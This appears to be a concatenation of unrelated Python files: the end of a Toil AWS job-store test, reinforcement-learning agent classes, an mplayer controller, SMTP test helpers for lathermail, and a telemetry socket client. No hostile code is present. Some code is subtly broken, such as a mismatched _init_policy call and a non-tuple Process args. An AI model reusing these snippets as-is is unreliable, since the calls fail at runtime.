def testInvalidJobStoreName(self):
from toil.jobStores.aws.jobStore import AWSJobStore
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a--b')
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:' + ('a' * 100))
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a_b')
@needs_aws_s3
@needs_encryption
@slow
class EncryptedAWSJobStoreTest(AWSJobStoreTest, AbstractEncryptedJobStoreTest.Test):
pass
class StubHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
fileContents = 'A good programmer looks both ways before crossing a one-way street'
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", len(self.fileContents))
self.end_headers()
# python 3 requires self.fileContents to be a bytestring
if sys.version_info >= (3, 0):
self.fileContents = self.fileContents.encode('utf-8')
self.wfile.write(self.fileContents)
AbstractJobStoreTest.Test.makeImportExportTests()
|
models.py
|
"""
A2C, IA2C, MA2C models
@author: Tianshu Chu
"""
import os
from agents.utils import *
from agents.policies import *
import logging
import multiprocessing as mp
import numpy as np
import tensorflow as tf
class A2C:
def __init__(self, n_s, n_a, total_step, model_config, seed=0, n_f=None):
# load parameters
self.name = 'a2c'
self.n_agent = 1
# init reward norm/clip
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s = n_s
self.n_a = n_a
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy = self._init_policy(n_s, n_a, n_f, model_config)
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
def _init_policy(self, n_s, n_a, n_w, n_f, model_config, agent_name=None):
n_fw = model_config.getint('num_fw')
n_ft = model_config.getint('num_ft')
n_lstm = model_config.getint('num_lstm')
if self.name == 'ma2c':
n_fp = model_config.getint('num_fp')
policy = FPLstmACPolicy(n_s, n_a, n_w, n_f, self.n_step, n_fc_wave=n_fw,
n_fc_wait=n_ft, n_fc_fp=n_fp, n_lstm=n_lstm, name=agent_name)
else:
policy = LstmACPolicy(n_s, n_a, n_w, self.n_step, n_fc_wave=n_fw,
n_fc_wait=n_ft, n_lstm=n_lstm, name=agent_name)
return policy
def _init_scheduler(self, model_config):
lr_init = model_config.getfloat('lr_init')
lr_decay = model_config.get('lr_decay')
beta_init = model_config.getfloat('entropy_coef_init')
beta_decay = model_config.get('entropy_decay')
if lr_decay == 'constant':
self.lr_scheduler = Scheduler(lr_init, decay=lr_decay)
else:
lr_min = model_config.getfloat('LR_MIN')
self.lr_scheduler = Scheduler(lr_init, lr_min, self.total_step, decay=lr_decay)
if beta_decay == 'constant':
self.beta_scheduler = Scheduler(beta_init, decay=beta_decay)
else:
beta_min = model_config.getfloat('ENTROPY_COEF_MIN')
beta_ratio = model_config.getfloat('ENTROPY_RATIO')
self.beta_scheduler = Scheduler(beta_init, beta_min, self.total_step * beta_ratio,
decay=beta_decay)
def _init_train(self, model_config):
# init loss
v_coef = model_config.getfloat('value_coef')
max_grad_norm = model_config.getfloat('max_grad_norm')
alpha = model_config.getfloat('rmsp_alpha')
epsilon = model_config.getfloat('rmsp_epsilon')
self.policy.prepare_loss(v_coef, max_grad_norm, alpha, epsilon)
# init replay buffer
gamma = model_config.getfloat('gamma')
self.trans_buffer = OnPolicyBuffer(gamma)
def save(self, model_dir, global_step):
self.saver.save(self.sess, model_dir + 'checkpoint', global_step=global_step)
def load(self, model_dir, checkpoint=None):
save_file = None
save_step = 0
if os.path.exists(model_dir):
if checkpoint is None:
for file in os.listdir(model_dir):
if file.startswith('checkpoint'):
prefix = file.split('.')[0]
tokens = prefix.split('-')
if len(tokens) != 2:
continue
cur_step = int(tokens[1])
if cur_step > save_step:
save_file = prefix
save_step = cur_step
else:
save_file = 'checkpoint-' + str(int(checkpoint))
if save_file is not None:
self.saver.restore(self.sess, model_dir + save_file)
logging.info('Checkpoint loaded: %s' % save_file)
return True
logging.error('Can not find old checkpoint for %s' % model_dir)
return False
def reset(self):
self.policy._reset()
def backward(self, R, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
obs, acts, dones, Rs, Advs = self.trans_buffer.sample_transition(R)
self.policy.backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
def forward(self, ob, done, out_type='pv'):
return self.policy.forward(self.sess, ob, done, out_type)
def add_transition(self, ob, action, reward, value, done):
# Hard code the reward norm for negative reward only
if (self.reward_norm):
reward /= self.reward_norm
if self.reward_clip:
reward = np.clip(reward, -self.reward_clip, self.reward_clip)
self.trans_buffer.add_transition(ob, action, reward, value, done)
class IA2C(A2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, total_step,
model_config, seed=0):
self.name = 'ia2c'
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_w, n_a) in enumerate(zip(self.n_s_ls, self.n_w_ls, self.n_a_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s - n_w, n_a, n_w, 0, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
def _init_train(self, model_config):
# init loss
v_coef = model_config.getfloat('value_coef')
max_grad_norm = model_config.getfloat('max_grad_norm')
alpha = model_config.getfloat('rmsp_alpha')
epsilon = model_config.getfloat('rmsp_epsilon')
gamma = model_config.getfloat('gamma')
self.trans_buffer_ls = []
for i in range(self.n_agent):
self.policy_ls[i].prepare_loss(v_coef, max_grad_norm, alpha, epsilon)
self.trans_buffer_ls.append(OnPolicyBuffer(gamma))
def backward(self, R_ls, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
for i in range(self.n_agent):
obs, acts, dones, Rs, Advs = self.trans_buffer_ls[i].sample_transition(R_ls[i])
if i == 0:
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
else:
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta)
def forward(self, obs, done, out_type='pv'):
if len(out_type) == 1:
out = []
elif len(out_type) == 2:
out1, out2 = [], []
for i in range(self.n_agent):
cur_out = self.policy_ls[i].forward(self.sess, obs[i], done, out_type)
if len(out_type) == 1:
out.append(cur_out)
else:
out1.append(cur_out[0])
out2.append(cur_out[1])
if len(out_type) == 1:
return out
else:
return out1, out2
def backward_mp(self, R_ls, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
cur_beta = self.beta_scheduler.get(self.n_step)
def worker(i):
obs, acts, dones, Rs, Advs = self.trans_buffer_ls[i].sample_transition(R_ls[i])
self.policy_ls[i].backward(self.sess, obs, acts, dones, Rs, Advs, cur_lr, cur_beta,
summary_writer=summary_writer, global_step=global_step)
mps = []
for i in range(self.n_agent):
p = mp.Process(target=worker, args=(i))
p.start()
mps.append(p)
for p in mps:
p.join()
def reset(self):
for policy in self.policy_ls:
policy._reset()
def add_transition(self, obs, actions, rewards, values, done):
if (self.reward_norm):
rewards = rewards / self.reward_norm
if self.reward_clip:
rewards = np.clip(rewards, -self.reward_clip, self.reward_clip)
for i in range(self.n_agent):
self.trans_buffer_ls[i].add_transition(obs[i], actions[i],
rewards[i], values[i], done)
class MA2C(IA2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, n_f_ls, total_step,
model_config, seed=0):
self.name = 'ma2c'
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_f_ls = n_f_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_a, n_w, n_f) in enumerate(zip(self.n_s_ls, self.n_a_ls, self.n_w_ls, self.n_f_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s - n_f - n_w, n_a, n_w, n_f, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.sess.run(tf.global_variables_initializer())
class IQL(A2C):
def __init__(self, n_s_ls, n_a_ls, n_w_ls, total_step, model_config, seed=0, model_type='dqn'):
self.name = 'iql'
self.model_type = model_type
self.agents = []
self.n_agent = len(n_s_ls)
self.reward_clip = model_config.getfloat('reward_clip')
self.reward_norm = model_config.getfloat('reward_norm')
self.n_s_ls = n_s_ls
self.n_a_ls = n_a_ls
self.n_w_ls = n_w_ls
self.n_step = model_config.getint('batch_size')
# init tf
tf.reset_default_graph()
tf.set_random_seed(seed)
config = tf.ConfigProto(allow_soft_placement=True)
self.sess = tf.Session(config=config)
self.policy_ls = []
for i, (n_s, n_a, n_w) in enumerate(zip(self.n_s_ls, self.n_a_ls, self.n_w_ls)):
# agent_name is needed to differentiate multi-agents
self.policy_ls.append(self._init_policy(n_s, n_a, n_w, model_config,
agent_name='{:d}a'.format(i)))
self.saver = tf.train.Saver(max_to_keep=5)
if total_step:
# training
self.total_step = total_step
self._init_scheduler(model_config)
self._init_train(model_config)
self.cur_step = 0
self.sess.run(tf.global_variables_initializer())
def _init_policy(self, n_s, n_a, n_w, model_config, agent_name=None):
if self.model_type == 'dqn':
n_h = model_config.getint('num_h')
n_fc = model_config.getint('num_fc')
policy = DeepQPolicy(n_s - n_w, n_a, n_w, self.n_step, n_fc0=n_fc, n_fc=n_h,
name=agent_name)
else:
policy = LRQPolicy(n_s, n_a, self.n_step, name=agent_name)
return policy
def _init_scheduler(self, model_config):
lr_init = model_config.getfloat('lr_init')
lr_decay = model_config.get('lr_decay')
eps_init = model_config.getfloat('epsilon_init')
eps_decay = model_config.get('epsilon_decay')
if lr_decay == 'constant':
self.lr_scheduler = Scheduler(lr_init, decay=lr_decay)
else:
lr_min = model_config.getfloat('lr_min')
self.lr_scheduler = Scheduler(lr_init, lr_min, self.total_step, decay=lr_decay)
if eps_decay == 'constant':
self.eps_scheduler = Scheduler(eps_init, decay=eps_decay)
else:
eps_min = model_config.getfloat('epsilon_min')
eps_ratio = model_config.getfloat('epsilon_ratio')
self.eps_scheduler = Scheduler(eps_init, eps_min, self.total_step * eps_ratio,
decay=eps_decay)
def _init_train(self, model_config):
# init loss
max_grad_norm = model_config.getfloat('max_grad_norm')
gamma = model_config.getfloat('gamma')
buffer_size = model_config.getfloat('buffer_size')
self.trans_buffer_ls = []
for i in range(self.n_agent):
self.policy_ls[i].prepare_loss(max_grad_norm, gamma)
self.trans_buffer_ls.append(ReplayBuffer(buffer_size, self.n_step))
def backward(self, summary_writer=None, global_step=None):
cur_lr = self.lr_scheduler.get(self.n_step)
if self.trans_buffer_ls[0].size < self.trans_buffer_ls[0].batch_size:
return
for i in range(self.n_agent):
for k in range(10):
obs, acts, next_obs, rs, dones = self.trans_buffer_ls[i].sample_transition()
if i == 0:
self.policy_ls[i].backward(self.sess, obs, acts, next_obs, dones, rs, cur_lr,
summary_writer=summary_writer,
global_step=global_step + k)
else:
self.policy_ls[i].backward(self.sess, obs, acts, next_obs, dones, rs, cur_lr)
def forward(self, obs, mode='act', stochastic=False):
if mode == 'explore':
eps = self.eps_scheduler.get(1)
action = []
qs_ls = []
for i in range(self.n_agent):
qs = self.policy_ls[i].forward(self.sess, obs[i])
if (mode == 'explore') and (np.random.random() < eps):
action.append(np.random.randint(self.n_a_ls[i]))
else:
if not stochastic:
action.append(np.argmax(qs))
else:
qs = qs / np.sum(qs)
action.append(np.random.choice(np.arange(len(qs)), p=qs))
qs_ls.append(qs)
return action, qs_ls
def reset(self):
# do nothing
return
def add_transition(self, obs, actions, rewards, next_obs, done):
if (self.reward_norm):
rewards = rewards / self.reward_norm
if self.reward_clip:
rewards = np.clip(rewards, -self.reward_clip, self.reward_clip)
for i in range(self.n_agent):
self.trans_buffer_ls[i].add_transition(obs[i], actions[i],
rewards[i], next_obs[i], done)
|
player.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
对mplayer及其他播放器(TODO)的控制
player = MPlayer()
方法:
player.start(url)
player.pause()
player.quit()
player.loop()
player.set_volume(50)
player.time_pos
player.is_alive
queue自定义get_song方法, 从中取出url, 进行播放(暂时, 以后可以抽象)
player.start_queue(queue)
如果需要更新,更换播放列表直接重复上面命令即可
player.start_queue(queue)
"""
import subprocess
import logging
import signal
import fcntl
import time
import abc
import os
from threading import Thread, Event
logger = logging.getLogger('doubanfm.player')
class NotPlayingError(Exception):
"""对播放器操作但播放器未在运行"""
pass
class PlayerUnavailableError(Exception):
"""该播放器在该系统上不存在"""
pass
class Player(object):
"""所有播放器的抽象类"""
__metaclass__ = abc.ABCMeta
# Command line name for the player (e.g. "mplayer")
_player_command = ""
# Default arguments (excluding command name)
_default_args = []
_null_file = open(os.devnull, "w")
@abc.abstractmethod
def __init__(self, default_volume=50):
"""初始化
子类需要先判断该播放器是否可用(不可用则抛出异常),再调用该方法
event: 传入的一个 Event ,用于通知播放完成
default_volume: 默认音量
"""
self.sub_proc = None # subprocess instance
self._args = [self._player_command] + self._default_args
self._exit_event = Event()
self._volume = default_volume
def __repr__(self):
if self.is_alive:
status = 'PID {0}'.format(self.sub_proc.pid)
else:
status = 'not running'
return '<{0} ({1})>'.format(self.__class__.__name__, status)
def _run_player(self, extra_cmd):
"""
运行播放器(若当前已有正在运行的,强制推出)
extra_cmd: 额外的参数 (list)
"""
# Force quit old process
if self.is_alive:
self.quit()
args = self._args + extra_cmd
logger.debug("Exec: " + ' '.join(args))
self.sub_proc = subprocess.Popen(
args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._null_file,
preexec_fn=os.setsid
)
# Set up NONBLOCKING flag for the pipe
flags = fcntl.fcntl(self.sub_proc.stdout, fcntl.F_GETFL)
flags |= os.O_NONBLOCK
fcntl.fcntl(self.sub_proc.stdout, fcntl.F_SETFL, flags)
# Start watchdog
Thread(target=self._watchdog).start()
def _watchdog(self):
"""
监控正在运行的播放器(独立线程)
播放器退出后将会设置 _exit_event
"""
if not self.is_alive:
logger.debug("Player has already terminated.")
self._exit_event.set()
return
logger.debug("Watching %s[%d]",
self._player_command, self.sub_proc.pid)
returncode = self.sub_proc.wait()
logger.debug("%s[%d] exit with code %d",
self._player_command, self.sub_proc.pid, returncode)
self._exit_event.set()
@property
def is_alive(self):
"""判断播放器是否正在运行"""
if self.sub_proc is None:
return False
return self.sub_proc.poll() is None
def quit(self):
"""退出播放器
子类应当覆盖这个方法(但不强制),先尝试 gracefully exit ,再调用 super().quit()
"""
if not self.is_alive:
return
self.sub_proc.terminate()
# Abstract methods
@abc.abstractmethod
def start(self, url):
"""开始播放
url: 歌曲地址
"""
pass
@abc.abstractmethod
def pause(self):
"""暂停播放"""
pass
@abc.abstractmethod
def set_volume(self, volume):
"""设置音量
volume: 音量 (int)"""
self._volume = volume # int
@abc.abstractproperty
def time_pos(self):
"""获取当前播放时间
返回播放时间的秒数 (int)"""
pass
class MPlayer(Player):
_player_command = "mplayer"
_default_args = [
'-slave',
'-nolirc', # Get rid of a warning
'-quiet', # Cannot use really-quiet because of get_* queries
'-softvol', # Avoid using hardware (global) volume
'-cache', '1024', # Use 5MiB cache
'-cache-min', '0.1' # Start playing after 2% cache filled
]
def __init__(self, *args):
super(MPlayer, self).__init__(*args)
self._exit_queue_event = False
self._loop = False
self._pause = False
self._time = 0
def _watchdog_queue(self):
self._exit_queue_event = True
while self._exit_queue_event:
if self._loop:
self.start(self.queue.get_playingsong()['url'])
else:
self.start(self.queue.get_song()['url'])
self.sub_proc.wait() # Wait for event
def start_queue(self, queue, volume=None):
self.queue = queue
self._volume = volume if volume else self._volume
if not self._exit_queue_event:
Thread(target=self._watchdog_queue).start()
else:
try:
self.sub_proc.terminate()
except OSError:
logger.info('wrong with start_queue')
def loop(self):
self._loop = False if self._loop else True
def next(self):
self.start_queue(self.queue, self._volume)
def start(self, url):
self._run_player(['-volume', str(self._volume), url])
def pause(self):
"""
pasue状态下如果取时间会使歌曲继续, 这里加了一个_pause状态
"""
self._pause = False if self._pause else True
self._send_command('pause')
def quit(self):
# Force quit the whole process group of mplayer.
# mplayer will not respond during network startup
# and has two processes in slave mode.
self._exit_queue_event = False # 标记_watchdog_queue结束
if not self.is_alive:
return
try:
os.killpg(os.getpgid(self.sub_proc.pid), signal.SIGKILL)
except OSError:
# The player might have exited itself.
pass
@property
def time_pos(self):
try:
if self._pause: # 暂停时直接返回_time
return self._time
songtime = self._send_command('get_time_pos', 'ANS_TIME_POSITION')
if songtime:
self._time = int(round(float(songtime)))
return self._time
else:
return 0
except NotPlayingError:
return 0
def set_volume(self, volume):
# volume <value> [abs] set if abs is not zero, otherwise just add delta
self._volume = volume
self._send_command("volume %d 1" % volume)
super(MPlayer, self).set_volume(volume)
# Special functions for mplayer
def _send_command(self, cmd, expect=None):
"""Send a command to MPlayer.
cmd: the command string
expect: expect the output starts with a certain string
The result, if any, is returned as a string.
"""
if not self.is_alive:
raise NotPlayingError()
logger.debug("Send command to mplayer: " + cmd)
cmd = cmd + "\n"
# In Py3k, TypeErrors will be raised because cmd is a string but stdin
# expects bytes. In Python 2.x on the other hand, UnicodeEncodeErrors
# will be raised if cmd is unicode. In both cases, encoding the string
# will fix the problem.
try:
self.sub_proc.stdin.write(cmd)
except (TypeError, UnicodeEncodeError):
self.sub_proc.stdin.write(cmd.encode('utf-8', 'ignore'))
time.sleep(0.1) # wait for mplayer (better idea?)
# Expect a response for 'get_property' only
if not expect:
return
while True:
try:
output = self.sub_proc.stdout.readline().rstrip()
output = output.decode('utf-8')
except IOError:
return None
# print output
split_output = output.split('=')
# print(split_output)
if len(split_output) == 2 and split_output[0].strip() == expect:
# We found it
value = split_output[1]
return value.strip()
|
utils.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
import time
import socket
import unittest
import smtplib
import json
from threading import Thread
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.utils import formatdate, formataddr
from email.header import Header
import lathermail
import lathermail.db
import lathermail.smtp
from lathermail.compat import Encoders, NO_CONTENT, unicode, urlencode
class InvalidStatus(Exception):
def __init__(self, response):
super(InvalidStatus, self).__init__("Invalid status {}.\n{}".format(response.status_code, response.data))
self.response = response
self.code = response.status_code
class SendEmailError(Exception):
""" Exception, raised in case send is failed.
"""
class BaseTestCase(unittest.TestCase):
inbox = "inbox"
password = "password"
port = 2525
server = None
db_name = "lathermail_test_db"
prefix = "/api/0"
@classmethod
def setUpClass(cls):
conf = lathermail.app.config
if os.getenv("LATHERMAIL_TEST_DB_TYPE", "sqlite") == "mongo":
conf["DB_URI"] = conf["SQLALCHEMY_DATABASE_URI"] = "mongodb://localhost/%s" % cls.db_name
else:
conf["DB_URI"] = conf["SQLALCHEMY_DATABASE_URI"] = "sqlite:///:memory:"
lathermail.init_app()
cls.c = lathermail.app.test_client()
super(BaseTestCase, cls).setUpClass()
cls.server = SmtpServerRunner(cls.db_name)
cls.server.start(cls.port)
@classmethod
def tearDownClass(cls):
super(BaseTestCase, cls).tearDownClass()
def setUp(self):
lathermail.db.engine.switch_db(self.db_name)
super(BaseTestCase, self).setUp()
def tearDown(self):
with lathermail.app.app_context():
lathermail.db.engine.drop_database(self.db_name)
def request(self, method, url, params=None, raise_errors=True, parse_json=True, **kwargs):
method = method.lower()
new_kwargs = {"headers": {"X-Mail-Inbox": self.inbox, "X-Mail-Password": self.password}}
new_kwargs.update(kwargs)
func = getattr(self.c, method.lower())
if params:
params = _prepare_params(params)
if method in ("get", "delete"):
new_kwargs["query_string"] = urlencode(params)
else:
new_kwargs["data"] = params
rv = func(self.prefix + url, **new_kwargs)
if parse_json:
try:
rv.json = json.loads(rv.data.decode("utf-8"))
except ValueError as e:
if rv.status_code != NO_CONTENT:
print("JSON decode error: {}, data:\n{}".format(e, rv.data))
rv.json = None
if raise_errors and rv.status_code >= 400:
raise InvalidStatus(rv)
return rv
def get(self, url, params=None, **kwargs):
return self.request("get", url, params, **kwargs)
def delete(self, url, params=None, **kwargs):
return self.request("delete", url, params, **kwargs)
def send(self, user=None, password=None, subject="test", body="Hello"):
smtp_send_email("test1@example.com", subject, "me@example.com", body,
user=user or self.inbox, password=password or self.password, port=self.port)
def _prepare_params(params):
def convert(v):
if isinstance(v, unicode):
return v.encode("utf-8")
if isinstance(v, str):
return v
return str(v)
return {convert(k): convert(v) for k, v in params.items()}
def prepare_send_to_field(name_email_pairs):
return ", ".join([formataddr((str(Header(name, "utf-8")), email))
for name, email in name_email_pairs])
def smtp_send_email(email, subject, from_addr, body, server_host="127.0.0.1", user=None, password=None,
emails=None, attachments=None, port=0, html_body=None):
msg = MIMEMultipart()
msg['To'] = email
msg['Subject'] = subject
msg['From'] = from_addr
msg['Date'] = formatdate(localtime=True)
msg.attach(MIMEText(body, _charset="utf8"))
if html_body:
msg.attach(MIMEText(html_body, "html", _charset="utf8"))
for name, data in attachments or []:
part = MIMEBase('application', "octet-stream")
part.set_payload(data)
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment', filename=(Header(name, 'utf-8').encode()))
msg.attach(part)
try:
s = smtplib.SMTP(server_host, port)
if user and password:
s.login(user, password)
if emails is None:
emails = [email]
s.sendmail(from_addr, emails, msg.as_string())
s.quit()
#print(u"Sent email to [%s] from [%s] with subject [%s]", email, from_addr, subject)
except (smtplib.SMTPConnectError, smtplib.SMTPException, IOError) as e:
print("Sending email error to [%s] from [%s] with subject [%s]:\n%s", email, from_addr, subject, e)
raise SendEmailError(e)
def send_email_plain(from_addr, to_addrs, msg, user=None, password=None, server_host="127.0.0.1", port=0):
try:
s = smtplib.SMTP(server_host, port)
if user and password:
s.login(user, password)
s.sendmail(from_addr, to_addrs, msg)
s.quit()
except (smtplib.SMTPConnectError, smtplib.SMTPException, IOError) as e:
print("Sending email error to [%s] from [%s] with subject [%s]:\n%s", to_addrs, from_addr, e)
raise SendEmailError(e)
class SmtpServerRunner(object):
def __init__(self, db_name):
self._process = None
self.db_name = db_name
def start(self, port=2025):
def wrapper(**kwargs):
lathermail.db.engine.switch_db(self.db_name)
lathermail.smtp.serve_smtp(**kwargs)
smtp_thread = Thread(target=wrapper, kwargs=dict(handler=lathermail.db.engine.message_handler, port=port))
smtp_thread.daemon = True
smtp_thread.start()
self.wait_start(port)
def wait_start(self, port):
timeout = 0.1
host_port = ("127.0.0.1", port)
for i in range(10):
try:
sock = socket.create_connection(host_port, timeout=timeout)
except Exception:
time.sleep(timeout)
continue
else:
sock.close()
return
raise Exception("Can't connect to %s" % str(host_port))
|
telem_display.py
|
import sys
import functools
import signal
import select
import socket
import numpy as np
import pickle
import matplotlib.pyplot as plt
import time
import datetime
from multiprocessing import Process, Queue
sys.path.append('../dhmsw/')
import interface
import telemetry_iface_ag
import struct
PLOT = True
headerStruct = struct.Struct('III')
class guiclient(object):
def __init__(self):
self.sock = None
self.displaythread = Process(target=self.DisplayThread)
self.displaythread.daemon = True
self.displayQ = Queue()
self.exit = False
self.maxlen = 150995023
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, self.signal_handler)
def signal_handler(self, signal, frame):
self.exit = True
self.displayQ.put(None)
def restore_frame(self, data, meta, z):
w, h, compval, val, size, actualsize,ts, gain, ccdtemp = meta
dtidx = 0
for i in range(0, w*h,compval):
z[i] = data[dtidx];
dtidx += 1
def DisplayThread(self):
if PLOT:
f, axes = plt.subplots(sharex=True)
for i in range(1):
#axes[i].imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
axes.clear()
#axes.imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
reconst_telemetry = telemetry_iface_ag.Reconstruction_Telemetry()
heartbeat_telemetry = telemetry_iface_ag.Heartbeat_Telemetry()
framesource_telemetry = telemetry_iface_ag.Framesource_Telemetry()
datalogger_telemetry = telemetry_iface_ag.Datalogger_Telemetry()
guiserver_telemetry = telemetry_iface_ag.Guiserver_Telemetry()
session_telemetry = telemetry_iface_ag.Session_Telemetry()
hologram_telemetry = telemetry_iface_ag.Hologram_Telemetry()
fouriermask_telemetry = telemetry_iface_ag.Fouriermask_Telemetry()
while True:
msg = self.displayQ.get()
if msg is None:
break
#print("**************** Display Thread")
msgid, srcid, totalbytes= headerStruct.unpack(msg[0:struct.calcsize(headerStruct.format)])
meta = (msgid, srcid, totalbytes)
offset = struct.calcsize(headerStruct.format)
#print('offset=%d'%(offset))
data = None
if srcid == interface.SRCID_TELEMETRY_RECONSTRUCTION:
print('Received RECONSTRUCTION Telemetry')
data = reconst_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_HEARTBEAT:
data = heartbeat_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_FRAMESOURCE:
data = framesource_telemetry.unpack_from(msg, offset=offset)
print('Framesource state: ', data.state)
elif srcid == interface.SRCID_TELEMETRY_SESSION:
data = session_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_DATALOGGER:
data = datalogger_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_HOLOGRAM:
data = hologram_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_GUISERVER:
data = guiserver_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_FOURIERMASK:
data = fouriermask_telemetry.unpack_from(msg, offset=offset)
if PLOT:
mask = np.frombuffer(data.mask, dtype=np.uint8).reshape((2048,2048))
#mask = np.asarray(data.mask,dtype=np.int8).reshape((2048,2048))
axes.clear()
#axes.imshow(mask[:,:], extent=[2048,0,0,2048], aspect="auto")
axes.imshow(mask[:,:], aspect="auto")
plt.suptitle(repr(time.time()))
#axes.set_ylim(axes.get_ylim()[::-1])
plt.draw()
plt.pause(0.001)
else:
print('Unknown Telemetry')
if data and srcid != interface.SRCID_TELEMETRY_HEARTBEAT:
print(time.time(), datetime.datetime.now())
print(data)
pass
print('End of DisplayThread')
def connect_to_server(self, server, port):
#headerStruct = struct.Struct('HHBIIIHH')
totlen = 0
count = 0
### Continous receive of data
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((server, port))
self.readfds = [self.sock]
### Start Display Thread
self.displaythread.start()
length = None
buf = b''
data = b''
msg=b''
lasttime = time.time()
meta = None
totalbytes = 0
while True:
infds, outfds, errfds = select.select(self.readfds, [], [], 5)
if not (infds or outfds or errfds):
continue
if self.exit: break
for s in infds:
if s is self.sock:
### Get as much data as we can
packet = self.sock.recv(255)
if not packet:
self.exit = True
self.displayQ.put_nowait(None)
break
data += packet
datalen = len(data)
#print('len packet= %d'%(len(packet)))
### If he haven't processed the header/meta, then lets.
#if meta is None and datalen > struct.calcsize(headerStruct.format)+25:
if meta is None and datalen >= struct.calcsize(headerStruct.format):
#packet = self.sock.recv(12)
#print("Recieve: %s"%(':'.join("{:02x}".format(ord(c)) for c in packet[0:50])))
msg_id, srcid, totalbytes = headerStruct.unpack(data[0:struct.calcsize(headerStruct.format)])
totalbytes += struct.calcsize(headerStruct.format)
meta = (msg_id, srcid)
#print('msg_id=%d, srcid=%d, totalbytes=%d'%(msg_id, srcid, totalbytes))
if datalen >= totalbytes: ### We have a complete packet stored.
msg = data[:totalbytes]
data = data[totalbytes:]
meta = None
totalbytes = 0
#print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
#plt.show(block=False)
count+=1
self.displayQ.put_nowait(msg)
#print('Full message received after getting meta: datalen=%d, datalen after=%d'%(datalen, len(data)))
else:
if datalen < totalbytes:
continue
### We have a complete message
msg = data[:totalbytes]
data = data[totalbytes:]
#print('Full message received: datalen=%d, datalen after=%d'%(datalen, len(data)))
meta = None
totalbytes = 0
self.displayQ.put_nowait(msg)
#print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
count+=1
if self.exit: break
self.sock.close()
if __name__ == "__main__":
a = guiclient()
host= socket.gethostbyname('localhost')
port = 9996
print("Client host: %s: port: %d"%(host, port))
a.connect_to_server(host, port)
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
